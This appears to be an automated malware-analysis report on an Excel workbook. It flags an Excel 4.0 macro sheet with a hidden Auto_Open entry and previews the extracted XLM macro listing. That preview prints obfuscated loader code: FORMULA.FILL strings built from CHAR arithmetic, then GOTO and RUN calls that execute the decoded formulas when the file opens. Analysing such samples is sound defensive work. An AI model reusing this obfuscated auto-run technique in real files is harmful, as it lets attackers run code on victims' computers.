MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically triggering the Auto_Open function. The critical heuristic 'OLE_XLM_DANGEROUS_FN' indicates the use of dangerous formula APIs like RUN, suggesting the macro is designed to execute arbitrary code. The presence of the Auto_Open entry and the use of dangerous functions strongly indicate a malicious intent to execute code upon opening the document.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 129271 bytes |
SHA-256: ffb8b2f5b75064acacd3a457a239509ba7028b4828f51a278361ec20edc155ce |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!CL65299 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,HD22,"",156.00000000000000000000 ' Sheet,BK53,"",-1.25490196078431370807 ' Sheet,BJ110,"",-156.00000000000000000000 ' Sheet,BO123,"",108.00000000000000000000 ' Sheet,EV248,"",945.00000000000000000000 ' Sheet,GE255,"",166.00000000000000000000 ' Sheet,JJ257,"",0.31182795698924731242 ' Sheet,EM276,"",-1.80327868852459016757 ' Sheet,DN291,"",-514.00000000000000000000 ' Sheet,X302,"",520.00000000000000000000 ' Sheet,BS353,"",-2126.00000000000000000000 ' Sheet,BB357,"",-1.06250000000000000000 ' Sheet,FS451,"",-147.00000000000000000000 ' Sheet,IU490,"",-536.00000000000000000000 ' Sheet,GF520,"",-567.00000000000000000000 ' Sheet,EE580,"",-0.72727272727272729291 ' Sheet,JQ592,"",-0.11611374407582938928 ' Sheet,CH602,"",-0.03654320987654321312 ' Sheet,HV623,"",110.00000000000000000000 ' Sheet,S643,"",0.14769230769230770606 ' Sheet,GR643,"",-0.19069767441860466239 ' Sheet,FL722,"",1.44399999999999995026 ' Sheet,HF758,"",-5.34177215189873422219 ' Sheet,EY765,"",-47.00000000000000000000 ' Sheet,BE782,"",-0.72222222222222220989 ' Sheet,BL791,"",-0.68918918918918914418 ' Sheet,GN794,"",23.52001953125000000000 ' Sheet,S849,"",-122.50000000000000000000 ' Sheet,HZ856,"",0.20923076923076922018 ' Sheet,JI928,"",0.04854368932038834877 ' Sheet,HK970,"",11.16923076923077040590 ' Sheet,HO976,"",-98.00000000000000000000 ' Sheet,DH982,"",-18.89130434782608602973 ' Sheet,CW1019,"",-0.05333333333333333676 ' Sheet,CX1020,"",1121.00000000000000000000 ' Sheet,BN1059,"",-0.36363636363636364646 ' Sheet,DD1092,"",-49.00000000000000000000 ' Sheet,DR1101,"",1062.00000000000000000000 ' Sheet,BH1179,"",-6.79999999999999715783 ' Sheet,JK1199,"",1132.00000000000000000000 ' Sheet,CW1217,"FORMULA.FILL(CHAR(IR47272/HZ50809)&CHAR(FU1874+IL50197)&CHAR(E27033/DD56922)&CHAR(FK44424/CW27882)&CHAR(DQ58333-GZ52277)&CHAR(DQ58333*CV23015)&CHAR(IR47272+U61476)&CHAR(DY47735/GW52974)&CHAR(E27033/BH13381)&CHAR(HT64059-HY25715)&CHAR(FQ36069-V37590)&CHAR(FK44424/FI63995)&CHAR(E27033-S37054)&CHAR(FU1874/K44476)&CHAR(IR47272+IC22810)&CHAR(FU1874*IQ16369)&CHAR(FU1874-R64446)&CHAR(GK27697+EP57013)&CHAR(DQ58333/JM9358)&CHAR(GK27697*FN44538)&CHAR(E27033-ER50373),CW1218)","" ' Sheet,CW1219,GOTO(GL42812),"" ' Sheet,EY1226,"",115.50000000000000000000 ' Sheet,BM1240,"",556.00000000000000000000 ' Sheet,ET1256,"",-462.00000000000000000000 ' Sheet,JF1260,"",-0.78048780487804880757 ' Sheet,HT1340,"",545.00000000000000000000 ' Sheet,FG1388,"",578.00000000000000000000 ' Sheet,S1397,"",-252.00000000000000000000 ' Sheet,CZ1428,"",0.14769230769230770606 ' Sheet,FP1445,"",-1.24390243902439023849 ' Sheet,CN1449,"",-0.12322274881516587230 ' Sheet,H1467,"",-1075.00000000000000000000 ' Sheet,JE1620,"",-0.12658227848101266666 ' Sheet,BV1689,"",-1.26436781609195403320 ' Sheet,EP1801,"",-41.00000000000000000000 ' Sheet,IX1931,"FORMULA.FILL(CHAR(DQ58333/GF9274)&CHAR(FK44424+DO16552)&CHAR(DY47735/I8681)&CHAR(E27033-DR45014)&CHAR(FU1874+DW25424)&CHAR(EX9505-FA6446)&CHAR(FQ36069+I52631)&CHAR(DY47735+EF3436)&CHAR(DQ58333+HC11420)&CHAR(EX9505/HU4700)&CHAR(DQ58333/FU21895)&CHAR(FU1874+FP47791)&CHAR(IR47272-DQ48490)&CHAR(DQ58333/A13019)&CHAR(DQ58333*HE14703)&CHAR(GK27697*FY20773)&CHAR(FQ36069/GG44572)&CHAR(DQ58333/FY34564)&CHAR(E27033/W53066)&CHAR(FQ36069/T42006)&CHAR(IR47272/P47693)&CHAR(FQ36069/DL28201),IX1932)","" ' Sheet,IX1933,RUN(EH3814),"" ' Sheet,EH1941,"",54.00000000000000000000 ' Sheet,EO1987,"",105.00000000000000000000 ' Sheet,BX2000,"",15.17014925373134381914 ' Sheet,DA2053,"",-111.50000000000000000000 ' Sheet,GL2057,"",509.00000000000000000000 ' Sh ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.